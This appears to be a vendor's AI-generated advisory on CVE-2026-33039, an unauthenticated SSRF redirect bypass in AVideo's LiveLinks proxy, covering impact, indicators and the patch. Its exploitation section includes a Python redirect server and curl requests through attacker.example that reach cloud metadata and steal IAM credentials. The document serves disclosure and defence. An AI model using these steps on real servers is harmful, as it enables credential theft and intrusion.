CVE-2026-33039: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33039 is an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in WWBN AVideo, exploitable via an HTTP redirect bypass in the LiveLinks proxy component. It affects all AVideo versions prior to 26.0 (Composer package) and prior to 24.0 (npm package). The vulnerability was discovered by bugbunny.ai, disclosed on March 16, 2026, and published to the GitHub Advisory Database on March 17, 2026. It carries a CVSS v3.1 base score of 8.6 (High) (GitHub Advisory, AVideo Security Advisory).

Technical details

The root cause is CWE-918 (Server-Side Request Forgery): the plugin/LiveLinks/proxy.php endpoint applies the isSSRFSafeURL() check only to the initial user-supplied livelink URL parameter, but when get_headers() follows an HTTP 302 redirect, the resulting Location header value is passed directly to fakeBrowser() without re-validation. The fakeBrowser() function in objects/functionsBrowser.php performs a raw cURL GET with no IP validation, scheme restriction, or redirect control, unconditionally fetching any URL passed to it. The endpoint is fully unauthenticated — it explicitly sets $doNotConnectDatabaseIncludeConfig = 1 and $doNotStartSessionbaseIncludeConfig = 1 — and is publicly routable via the AVideo .htaccess rewrite rules. This creates a double SSRF exposure: get_headers() makes a header-only request to the internal target, and fakeBrowser() subsequently retrieves and returns the full response body to the attacker. A detailed proof-of-concept with step-by-step reproduction instructions is publicly available in the security advisory (AVideo Security Advisory, GitHub Advisory).

Impact

Successful exploitation allows an unauthenticated remote attacker to read cloud instance metadata from AWS (169.254.169.254), GCP (metadata.google.internal), and Azure (169.254.169.254), including temporary IAM role credentials (AccessKeyId, SecretAccessKey, Token) that can be used to pivot into cloud infrastructure. Attackers can also probe and map internal RFC1918 networks (10.x, 172.16–31.x, 192.168.x) and localhost services, and exfiltrate full response content from any HTTP GET-accessible internal service such as databases with HTTP interfaces, admin panels, and monitoring dashboards. The confidentiality impact is rated High with a changed scope, as the attack escapes the web application boundary to reach internal infrastructure (GitHub Advisory, AVideo Security Advisory).

Exploitability

A concrete, step-by-step proof-of-concept exploit is publicly available in the official security advisory, including a Python redirect server and specific curl commands targeting the vulnerable endpoint (AVideo Security Advisory). The vulnerability requires no authentication, no user interaction, and only network access to the AVideo instance, making it trivially exploitable. The EPSS score is approximately 0.032% (0.000320), indicating a currently low but non-zero probability of exploitation in the wild. There is no evidence of active in-the-wild exploitation or CISA KEV catalog listing at this time. The vulnerability is detectable by Qualys scanner (detection ID 5009290) (Feedly).

Exploitation steps

  1. Reconnaissance: Identify internet-facing AVideo instances running versions prior to 26.0 (Composer) or 24.0 (npm) using search engines like Shodan or Censys, or by directly probing the /plugin/LiveLinks/proxy.php endpoint.
  2. Set up attacker-controlled redirect server: Deploy a simple HTTP server that responds to any GET request with a 302 redirect to the desired internal target (e.g., http://169.254.169.254/latest/meta-data/):
# redirect_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', 'http://169.254.169.254/latest/meta-data/')
        self.end_headers()
HTTPServer(('0.0.0.0', 8080), RedirectHandler).serve_forever()
  1. Trigger the SSRF via redirect bypass: Send a crafted GET request to the vulnerable AVideo endpoint, supplying the attacker-controlled redirect server URL as the livelink parameter:
curl -s "https://TARGET/plugin/LiveLinks/proxy.php?livelink=https://attacker.example:8080/redirect"

The AVideo server passes the initial URL through isSSRFSafeURL() (which allows it), then follows the 302 redirect to the internal metadata endpoint without re-validation. 4. Retrieve cloud metadata: The response contains the AWS EC2 instance metadata listing (e.g., ami-id, instance-id, iam/). Strip the http://169.254.169.254: prefix from each line to recover the original metadata paths. 5. Escalate to IAM credential theft: Update the redirect server to point to http://169.254.169.254/latest/meta-data/iam/security-credentials/ and repeat the request to obtain temporary AWS credentials (AccessKeyId, SecretAccessKey, Token):

curl -s "https://TARGET/plugin/LiveLinks/proxy.php?livelink=https://attacker.example:8080/redirect-iam"
  1. Lateral movement: Use the harvested IAM credentials with the AWS CLI or SDK to access cloud resources, escalate privileges, or pivot to other services within the cloud environment (AVideo Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP/HTTPS connections from the AVideo server to 169.254.169.254, metadata.google.internal, or RFC1918 addresses (10.x, 172.16–31.x, 192.168.x) initiated by the web server process; unusual outbound connections to unknown external IPs on port 8080 or other non-standard ports (attacker redirect server).
  • Logs: Web server access logs showing GET requests to /plugin/LiveLinks/proxy.php with livelink parameter values pointing to external or unusual URLs; PHP/application error logs containing entries matching LiveLinks proxy: SSRF protection blocked URL: (indicating probing attempts that were caught) or absence of such entries for successful bypasses; cURL activity logs showing requests to 169.254.169.254 or internal addresses.
  • File System: No specific file artifacts are expected from this read-only SSRF attack, as fakeBrowser() only performs GET requests and returns content to the attacker without writing files.
  • Process: Unusual child processes or network connections spawned by the PHP-FPM or Apache/Nginx worker processes making outbound HTTP requests to cloud metadata endpoints or internal network ranges (AVideo Security Advisory).

Mitigation and workarounds

Update WWBN AVideo to version 26.0 or later (Composer) or 24.0 or later (npm), which includes the patch commit 0e56382 that adds follow_location: 0 and max_redirects: 0 to the get_headers() stream context and re-validates redirect target URLs with isSSRFSafeURL() before fetching (AVideo Patch Commit). As a network-level workaround, implement firewall rules to block outbound HTTP/HTTPS connections from the AVideo application server to 169.254.169.254, metadata.google.internal, and all RFC1918 address ranges. Additionally, apply network segmentation to restrict the AVideo instance's access to internal services and cloud metadata endpoints, and consider placing the application behind a WAF with SSRF detection rules (GitHub Advisory).

Community reactions

The vulnerability was reported by bugbunny.ai and disclosed responsibly through GitHub's security advisory process, with the maintainer (DanielnetoDotCom) publishing the advisory and patch on March 16, 2026. Coverage appeared on The Hacker Wire (The Hacker Wire) and was noted on Mastodon by the same outlet. Community discussion was observed on Bluesky (Bluesky). No major vendor statements beyond the official advisory or significant controversy have been noted.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management